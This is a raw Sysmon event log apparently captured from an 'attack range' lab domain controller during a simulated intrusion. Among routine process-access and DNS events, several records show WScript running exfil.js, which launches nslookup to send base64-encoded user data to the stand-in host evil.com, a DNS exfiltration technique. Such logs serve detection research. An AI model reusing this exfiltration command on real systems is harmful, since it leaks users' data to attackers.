14:16:34.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.149{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.149{2E1864BB-17C2-629A-C240-000000005F02}12925432C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-C440-000000005F02}7512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.150{2E1864BB-17C2-629A-C440-000000005F02}7512C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-C240-000000005F02}1292C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluvxoo.tmp 2>&1 10341000x8000000000000000201234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.097{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-C340-000000005F02}7620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.097{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-C340-000000005F02}7620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.081{2E1864BB-17C2-629A-C340-000000005F02}76207548C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-C240-000000005F02}1292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.065{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C340-000000005F02}7620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.050{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.050{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.050{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.050{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.050{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C240-000000005F02}1292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.050{2E1864BB-17A1-629A-783D-000000005F02}55528044C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-C240-000000005F02}1292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.059{2E1864BB-17C2-629A-C240-000000005F02}1292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluvxoo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.050{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvwen.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000201222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.634{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52796- 354300x8000000000000000201221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.634{00000000-0000-0000-0000-000000000000}3776<unknown process>-udpfalsefalse127.0.0.1-52795-false127.0.0.1-53domain 354300x8000000000000000201220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.633{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52795- 354300x8000000000000000201219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.633{00000000-0000-0000-0000-000000000000}3776<unknown process>-udpfalsefalse127.0.0.1-52794-false127.0.0.1-53domain 354300x8000000000000000201218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.633{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52794- 354300x8000000000000000201217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.531{2E1864BB-E13E-6299-0F00-000000005F02}308C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse46.243.179.10146.243.179.101.leadertelecom.ru4513-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local3389ms-wbt-server 354300x8000000000000000201216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.523{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52793- 354300x8000000000000000201215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.523{00000000-0000-0000-0000-000000000000}7788<unknown process>-udpfalsefalse127.0.0.1-52792-false127.0.0.1-53domain 354300x8000000000000000201214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.523{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52792- 354300x8000000000000000201213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.523{00000000-0000-0000-0000-000000000000}7788<unknown process>-udptruefalse127.0.0.1-52792-false127.0.0.1-53domain 354300x8000000000000000201212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.523{00000000-0000-0000-0000-000000000000}7788<unknown process>-udpfalsefalse127.0.0.1-52791-false127.0.0.1-53domain 354300x8000000000000000201211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.522{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52791- 354300x8000000000000000201210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.522{00000000-0000-0000-0000-000000000000}7788<unknown process>-udptruefalse127.0.0.1-52791-false127.0.0.1-53domain 354300x8000000000000000201209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.436{00000000-0000-0000-0000-000000000000}3964<unknown process>-udpfalsefalse127.0.0.1-52790-false127.0.0.1-53domain 354300x8000000000000000201208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.436{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52790- 354300x8000000000000000201207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.436{00000000-0000-0000-0000-000000000000}3964<unknown process>-udptruefalse127.0.0.1-52790-false127.0.0.1-53domain 354300x8000000000000000201206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.436{00000000-0000-0000-0000-000000000000}3964<unknown process>-udpfalsefalse127.0.0.1-52789-false127.0.0.1-53domain 354300x8000000000000000201205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.436{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52789- 354300x8000000000000000201204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.436{00000000-0000-0000-0000-000000000000}3964<unknown process>-udptruefalse127.0.0.1-52789-false127.0.0.1-53domain 354300x8000000000000000201203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.435{00000000-0000-0000-0000-000000000000}3964<unknown process>-udpfalsefalse127.0.0.1-52788-false127.0.0.1-53domain 354300x8000000000000000201202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52788- 354300x8000000000000000201201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.435{00000000-0000-0000-0000-000000000000}3964<unknown process>-udptruefalse127.0.0.1-52788-false127.0.0.1-53domain 10341000x8000000000000000201200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.018{2E1864BB-17C1-629A-C040-000000005F02}61687564C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-C140-000000005F02}660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.015{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.014{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.014{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.014{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.014{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C140-000000005F02}660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 